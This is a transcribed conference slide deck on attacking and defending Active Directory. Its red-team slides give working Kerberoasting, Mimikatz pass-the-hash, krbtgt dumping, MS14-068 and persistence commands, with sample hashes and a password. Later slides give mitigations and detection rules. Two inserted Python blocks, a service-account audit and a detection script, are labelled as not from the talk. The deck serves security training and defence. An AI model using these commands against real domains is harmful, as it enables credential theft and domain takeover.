The Dark Side of Active Directory - Copia · 2015-12-02


Page 1

presents

The Dark Side of Active Directory
Post-Exploitation like a boss without exploit

Guglielmo Scaiola – MCSE – CEI – CEH – CHFI – ECSA – ISO 27001 L.A. – Security+

[email protected] – @SoftwarGS

Page 2

Guglielmo «S0ftwar» Scaiola

@S0ftwarGS

Security Consultant & Ethical Hacker

Microsoft System Engineer – A.D. expert

Trainer & Speaker

Some MC* & other certification…

Computer addicted for fun and profit….☺

www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 2

Page 3

Agenda

• Opening considerations
  ◦ Why?
  ◦ A few statistics...
  ◦ The basics

• The dark side of the Force: Red Team

• Mitigation and detection: Blue Team

• Q & A

Page 4

Enterprise A.D.

Page 5

Blue or Red? Pink...

Page 6

Page 7

Page 8

Page 9

The dark side of the Force: Red Team

Page 10

• Recon (Scanning & Enumeration)

• Gaining Access

• Maintaining Access
  ◦ Privilege escalation
  ◦ Backdoor
  ◦ Lateral movement
    ◦ Recon (Scanning & Enumeration)
    ◦ Gaining Access
  ◦ Pivoting
    ◦ Recon (Scanning & Enumeration)
    ◦ Gaining Access

• Covering Tracks

Page 11

How to gain access?

Page 12

RAT: remote access tools

• Delivery

• Staging and C2 (multi-protocol: HTTP, HTTPS, DNS, SMB, ...)

• Anti-forensics

• Bypass AV, firewall, logging and IDS/IPS

• Surviving proxies – proxy awareness (detect & utilize proxies)

Page 13

Old School vs. New School

• Old School
  ◦ Exploit to gain access from external (Metasploit or other exploit)
  ◦ Shell / reverse shell
  ◦ Tunnel
  ◦ AV evasion

• New School
  ◦ Exploit to gain access from external (RAT) + C2
  ◦ Sysadmin tools
  ◦ PowerShell (no AV detection)

Page 14

Recon

Page 15

Recon

• Users
  ◦ dsquery user
  ◦ net user

• Computers
  ◦ dsquery computer

• Domain Controllers
  ◦ dsquery server

• Password Policy
  ◦ net accounts
  ◦ Get-ADDefaultDomainPasswordPolicy -Identity MyDomain.local

• Group Membership (Administrators, Domain Admins, ...)
  ◦ dsquery group
  ◦ net localgroup
  ◦ net group

Page 16

The dark side of the Force

Page 17

Warm-Up: Rename Administrator account?

• PsGetSid

• net localgroup administrators

Page 18

DSRM Password

• Who remembers the DSRM password?

• Easy or hard? (can it be guessed?)

• Server reboot + physical access (or iLO)

• So it is unlikely that anyone can abuse it, right?

• When do you use it? ...and what happens if it is not the one you expected? (what happens if an attacker resets it?)

Page 19

Page 20

Real World Enterprise

Page 21

Privilege Escalation

Page 22

SPN

setspn -s http/srv2k12r2.2k12.lan websvcs

SPN Purpose: A service principal name (SPN) is the name by which a Kerberos client uniquely identifies an instance of a service for a given Kerberos target computer.

SPN Format: serviceclass/host:port/servicename. serviceclass and host are required, but port and servicename are optional. The colon between host and port is only required when a port is present.
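The SPN format on this slide, and the "users or computers?" question of the next one, as a parser plus an inventory audit; this is an added example, not code from the talk. SAMPLE_INVENTORY is constructed and its account names are hypothetical.

```python
"""Parse Kerberos SPNs in the serviceclass/host:port/servicename form and
list which SPNs sit on user accounts rather than computer accounts.

Added example, not code from the talk. SAMPLE_INVENTORY is constructed and
the account names in it are hypothetical."""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Spn:
    service_class: str
    host: str
    port: Optional[int] = None
    service_name: Optional[str] = None

    def canonical(self) -> str:
        """Rebuild the SPN; the colon is emitted only when a port is present."""
        text = f"{self.service_class}/{self.host}"
        if self.port is not None:
            text += f":{self.port}"
        if self.service_name:
            text += f"/{self.service_name}"
        return text


def parse_spn(text: str) -> Spn:
    """Split an SPN into its parts, raising ValueError on malformed input.

    serviceclass and host are required; port and servicename are optional.
    Active Directory matches servicePrincipalName case-insensitively, so the
    service class and host are lower-cased to make duplicates easy to spot.
    """
    parts = text.strip().split("/")
    if len(parts) not in (2, 3) or not parts[0] or not parts[1]:
        raise ValueError(f"malformed SPN: {text!r}")
    service_class, host_port = parts[0], parts[1]
    service_name = parts[2] if len(parts) == 3 else None
    if len(parts) == 3 and not service_name:
        raise ValueError(f"empty service name in SPN: {text!r}")
    host, port = host_port, None
    if ":" in host_port:
        host, port_text = host_port.rsplit(":", 1)
        if not host or not port_text.isdigit() or not 0 < int(port_text) < 65536:
            raise ValueError(f"malformed host:port in SPN: {text!r}")
        port = int(port_text)
    return Spn(service_class.lower(), host.lower(), port, service_name)


# Constructed inventory (hypothetical accounts): objectClass is what tells a
# user account apart from a computer account.
SAMPLE_INVENTORY = [
    {"sam": "websvcs", "objectClass": "user",
     "servicePrincipalName": ["http/srv2k12r2.2k12.lan"]},
    {"sam": "SRV2K12R2$", "objectClass": "computer",
     "servicePrincipalName": ["HOST/srv2k12r2.2k12.lan", "HOST/SRV2K12R2"]},
    {"sam": "sqlsvc", "objectClass": "user",
     "servicePrincipalName": ["MSSQLSvc/sql01.2k12.lan:1433",
                              "MSSQLSvc/sql01.2k12.lan"]},
    {"sam": "ut001", "objectClass": "user", "servicePrincipalName": []},
]


def user_held_spns(inventory):
    """Return {sAMAccountName: [Spn, ...]} for user accounts that carry SPNs.

    Service tickets for these SPNs are encrypted with a human-chosen password,
    not a machine password, so these are the accounts to move to a gMSA or to
    a long random password first."""
    out = {}
    for acct in inventory:
        if acct["objectClass"] != "user":
            continue
        spns = [parse_spn(s) for s in acct.get("servicePrincipalName", [])]
        if spns:
            out[acct["sam"]] = spns
    return out
```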

Page 23

Users or Computers?

Page 24

Requesting tickets (slide stolen from @timmedin ☺)

Page 25

The attack... (no demo...)

• Find service accounts
  ◦ setspn -T domainname -F -Q */*
  ◦ Alternatively: C:\Tools\kerberoast-master\GetUserSPNs.ps1

• Identify user accounts, ignore computer accounts
  ◦ GetUserSPNs.ps1 extracts the users directly

• Request tickets (PowerShell)
  ◦ Add-Type -AssemblyName System.IdentityModel
  ◦ New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "http/srv2k12r2.2k12.lan"

Page 26

The attack... (2) (https://github.com/nidem/kerberoast)

• Request Ticket(s)
  ◦ One ticket:
    PS C:\> Add-Type -AssemblyName System.IdentityModel
    PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
  ◦ All the tickets:
    PS C:\> Add-Type -AssemblyName System.IdentityModel
    PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

• Extract the acquired tickets from RAM with Mimikatz
  ◦ mimikatz # kerberos::list /export

• Crack with tgsrepcrack
  ◦ ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

• Rewrite
  ◦ Make user appear to be a different user: ./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
  ◦ Add user to another group (in this case Domain Admins): ./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512

• Inject back into RAM with Mimikatz
  ◦ kerberos::ptt sql.kirbi

Page 27

Managing local admin passwords via GPP

Page 28

Gain local admin privs via GPP

• The security update addresses the vulnerability by removing the ability to configure and distribute passwords that use certain Group Policy preferences extensions

https://technet.microsoft.com/library/security/ms14-025

Page 29

Privilege escalation – local – GPP

Page 30

MS14-068

Page 31

MS14-068 kekeo

If it fails:

runas /noprofile /netonly /user:idontcare cmd

ms14068.exe /domain:child1.newtest.lab /user:ut001 /password:Ut1Passw0rd /ptt

Page 32

Persistence

Page 33

DSRM Password

• https://technet.microsoft.com/it-it/library/cc754363(v=ws.10).aspx

Page 34

DSRM Password

• https://technet.microsoft.com/en-us/library/cc732714(v=ws.10).aspx

• HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior

Page 35

Page 36

DSRM Password

• Mimikatz (on the DC)

• token::elevate

• lsadump::sam

• DA EXT

• mimikatz "privilege::debug" "sekurlsa::pth /domain:ADSDC03 /user:Administrator /ntlm:7c08d63a2f48f045971bc2236ed3f3ac" exit

Page 37

Mimikatz – dump cleartext password

Page 38

Dump password hash

Page 39

Dump password with mimikatz

lsadump::lsa /inject /name:krbtgt

lsadump::lsa

lsadump::lsa /patch

Page 40

DCSync

DCSync: 1) Discover the DC 2) Request replication of the user credentials via GetNCChanges

Page 41

Intermezzo

Mimikatz – pass-the-hash

Page 42

Mimikatz – over-pass-the-hash

• From AD online – mimikatz
  ◦ lsadump::lsa /inject /name:administrator

• From NTDS.DIT and System hive offline
  ◦ NTDSXtract

• From client LSASS memory – mimikatz
  ◦ sekurlsa::ekeys

mimikatz "sekurlsa::pth /user:admin2 /domain:child1.newtest.lab /ntlm:a87f3a337d73085c45f9416be5787d86" exit

Page 43

Silver ticket

• It is a TGS

• The advantage is that there is no communication with the DC when it is used

• Not «liked» because the computer account password changes every 30 days

• While a Golden ticket is encrypted/signed with the domain Kerberos service account (KRBTGT), a Silver Ticket is encrypted/signed by the service account (computer account credential extracted from the computer's local SAM or service account credential).

• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1

Page 44

Mimikatz – silver ticket and DC

Page 45

Mimikatz – Golden Ticket

Page 46

ADMT & SID History

Page 47

Active Directory Persistence: SID History

Page 48

Real World Enterprise

Page 49

Skeleton key

Page 50

AdminSDHolder

Page 51

AdminSDHolder

Page 52

Malicious Security Provider

• HKLM\System\CurrentControlSet\Control\Lsa\Security Packages

Page 53

Page 54

Mitigation and Detection: Blue Team

Page 55

Destined to lose?

• The attacks have changed:
  ◦ The event itself is no longer malicious (the «how»)
  ◦ The correlation is what is malicious:
    ◦ Who did this?
    ◦ From which host was it done?
    ◦ When?

• Mitigate and log/correlate

• Every attack we saw in the two sessions leaves a trace in the logs.

• We must implement systems that raise an alert on the presence of a certain event, or of a certain number of events, and that possibly correlate them (SIEM?)

The time of security = AV + firewall is over

Page 56

Working together...

Page 57

• Thinking an Active Directory domain is the security boundary

• Deploying systems with default settings

• Too many Domain Admins

• Not tracking/monitoring/documenting delegated access to Active Directory

• Over-permissioned Service Accounts

• Service Accounts with passwords less than 20 characters

• Using Group Policy Preferences to manage credentials

• Running non-essential roles and services on Domain Controllers

• Domain Controllers not patched promptly & Unpatched systems (srv & wks)

• Domain Controllers not running a "recent" OS version

• The same local Administrator account passwords on multiple computers

• Active Directory Admins logging on to untrusted systems

• Not monitoring admin group membership

• Not cleaning up admin group membership

• Not automatically removing inactive (stale) user and computer accounts

• Keeping legacy authentication active on the network (LM/NTLMv1)

• Being too trusting – Too many Trusts or Trusts without proper security controls

The Most Common Active Directory Security Issues and What You Can Do to Fix Them by Sean Metcalf

https://adsecurity.org/?p=1684

Page 58

Decalogue... Italian style

• Control administrative access, even for a few minutes (who? when? why? do I log what they do?)

• Low-privilege service accounts with complex passwords

• Administrative access to A.D. only from a few secure clients, no administrative access from other clients

• No local administrator privileges for users

• Token «hygiene»

• Consider the Domain, and not the Forest, as the security perimeter

• No identical local administrator password on multiple hosts

• Yes to UAC

• No PowerShell where it is not needed

• No passwords in GPP/GPO, batch files, files, etc...

• No legacy OS (as far as possible in production)

• Patch the OS and the applications (especially on the client side)

Page 59

Detection

• DSRM Password
  ◦ Id 4729 – set DSRM administrator password
  ◦ Monitor the key HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior

• DC Sync
  ◦ Create an allow list of the DC IPs and monitor DsGetNCChanges from IPs not in the list

• Malicious Security Support Provider
  ◦ Monitor the key HKLM\System\CurrentControlSet\Control\Lsa\Security Packages

• SID History
  ◦ Monitor who has the attribute set and any changes to it

• AdminSDHolder
  ◦ Monitor the ACLs of the AdminSDHolder object
  ◦ Monitor users and groups with AdminCount=1

• Golden/Silver Ticket – MS14-068
  ◦ Event IDs 4624 (account logon), 4672 (admin logon) and 4634 (account logoff) may carry the account domain field with the FQDN instead of the short name, or blank (or with characteristic strings). FOR NOW!!!
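Three of the rules on this slide (the forged-ticket domain-field check, the DCSync allow list from slide 40's GetNCChanges step, and the two watched LSA registry values) as runnable checks over normalised records; this is an added example, not code from the talk. SAMPLE_RECORDS is constructed, and EXPECTED_NETBIOS, DC_ALLOW_LIST and the host names are hypothetical.

```python
"""Apply three of the slide's detection rules to normalised event records.

Added example, not code from the talk. SAMPLE_RECORDS is constructed; the
field names mimic what a SIEM would extract from Security events
(4624/4672/4634), from a sensor that decodes DRSUAPI replication calls, and
from registry-change auditing. The domain name, DC IPs and hosts are
hypothetical."""
import ipaddress

LOGON_EVENTS = {4624, 4672, 4634}
EXPECTED_NETBIOS = "CHILD1"                     # hypothetical short domain name
DC_ALLOW_LIST = {ipaddress.ip_address(a)        # hypothetical DC addresses
                 for a in ("10.0.0.10", "10.0.0.11")}
WATCHED_KEYS = {                                # the two LSA values named on the slide
    r"HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior".lower(),
    r"HKLM\System\CurrentControlSet\Control\Lsa\Security Packages".lower(),
}


def check_logon_domain(rec):
    """Golden/Silver ticket, MS14-068: the account domain in 4624/4672/4634
    should be the short NetBIOS name; a forged ticket often leaves it blank
    or carries the FQDN instead."""
    if rec.get("event_id") not in LOGON_EVENTS:
        return None
    domain = (rec.get("account_domain") or "").strip()
    # Local accounts log on with the host name as domain and built-in
    # identities use NT AUTHORITY; neither is a forgery symptom.
    allowed = {EXPECTED_NETBIOS, "NT AUTHORITY", (rec.get("computer") or "").upper()}
    if not domain:
        reason = "blank account domain"
    elif "." in domain:
        reason = f"FQDN '{domain}' where the short name is expected"
    elif domain.upper() not in allowed:
        reason = f"unexpected account domain '{domain}'"
    else:
        return None
    return (f"possible forged ticket (event {rec['event_id']}): {rec.get('account')} "
            f"from {rec.get('src_ip')} on {rec.get('computer')}: {reason}")


def check_replication(rec):
    """DCSync: DsGetNCChanges is only legitimate between domain controllers,
    so a request from any address outside the DC allow list is an alert."""
    if rec.get("op") != "DsGetNCChanges":
        return None
    src = ipaddress.ip_address(rec["src_ip"])
    if src in DC_ALLOW_LIST:
        return None
    return (f"DCSync: DsGetNCChanges from non-DC {src} against {rec.get('dst_ip')} "
            f"as {rec.get('account')}")


def check_registry(rec):
    """DSRM logon behaviour and malicious SSP: any write to a watched LSA
    value is worth an alert, whatever the new data is."""
    if rec.get("op") != "registry_set" or rec["key"].lower() not in WATCHED_KEYS:
        return None
    return (f"sensitive LSA value changed on {rec.get('computer')}: {rec['key']} "
            f"= {rec.get('value')!r} by {rec.get('account')}")


RULES = (check_logon_domain, check_replication, check_registry)


def run_detections(records):
    """Return the alert strings raised by every rule over every record."""
    alerts = []
    for rec in records:
        for rule in RULES:
            hit = rule(rec)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed records: one benign and one suspicious case per rule.
SAMPLE_RECORDS = [
    {"event_id": 4624, "account": "ut001", "account_domain": "CHILD1",
     "src_ip": "10.0.1.25", "computer": "wks01"},                 # normal logon
    {"event_id": 4672, "account": "Administrator",
     "account_domain": "child1.newtest.lab",
     "src_ip": "10.0.1.77", "computer": "dc01"},                  # FQDN in domain field
    {"event_id": 4634, "account": "admin2", "account_domain": "",
     "src_ip": "10.0.1.77", "computer": "dc01"},                  # blank domain field
    {"op": "DsGetNCChanges", "src_ip": "10.0.0.11",
     "dst_ip": "10.0.0.10", "account": "DC02$"},                  # DC-to-DC replication
    {"op": "DsGetNCChanges", "src_ip": "10.0.1.77",
     "dst_ip": "10.0.0.10", "account": "admin2"},                 # DCSync from a workstation
    {"op": "registry_set", "account": "admin2", "computer": "dc01", "value": "2",
     "key": r"HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior"},
    {"op": "registry_set", "account": "ut001", "computer": "wks01", "value": "1",
     "key": r"HKLM\Software\Policies\Example"},                   # unrelated key
]
```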

Page 60

Microsoft Advanced Threat Analytics

Page 61

Page 62

• https://adsecurity.org

• http://blog.harmj0y.net/

• http://blog.gentilkiwi.com/mimikatz (better to follow him on Twitter)

• http://www.powershellempire.com

• http://www.labofapenetrationtester.com/

• But above all Twitter, Twitter and Twitter...

The secret: knowledge – the enemy: ignorance

Page 63

Q & A

Questions and Answers

Page 64

Recommended courses

OEC217 - PenTesting Techniques

EC001 - EC-Council Ethical Hacking & Countermeasures – CEH

OEC208 - Security for Network & System Administrators

For the future: a 2-3 day course on Active Directory security

Page 65

Thanks to:

• Passingthehash - @passingthehash

• Joe Bialek - @JosephBialek

• Sylvain Monné - @BiDOrD

• Chris Gates - @carnal0wnage

• Matt N. - @enigma0x3

• Will Schroeder - @harmj0y

• Justin Warner - @sixdub

and in particular to Benjamin Delpy - @gentilkiwi for his support, and to Sean Metcalf - @PyroTek3 for all the material he has made available

Stay Tuned...: @S0ftwarGS [email protected]

Page 66

OverNetEducation contacts

OverNet Education – info@overneteducation.it – www.overneteducation.it – Tel. 02 365738

@overnete – www.facebook.com/OverNetEducation – www.linkedin.com/company/overnet-solutions – www.wpc2015.it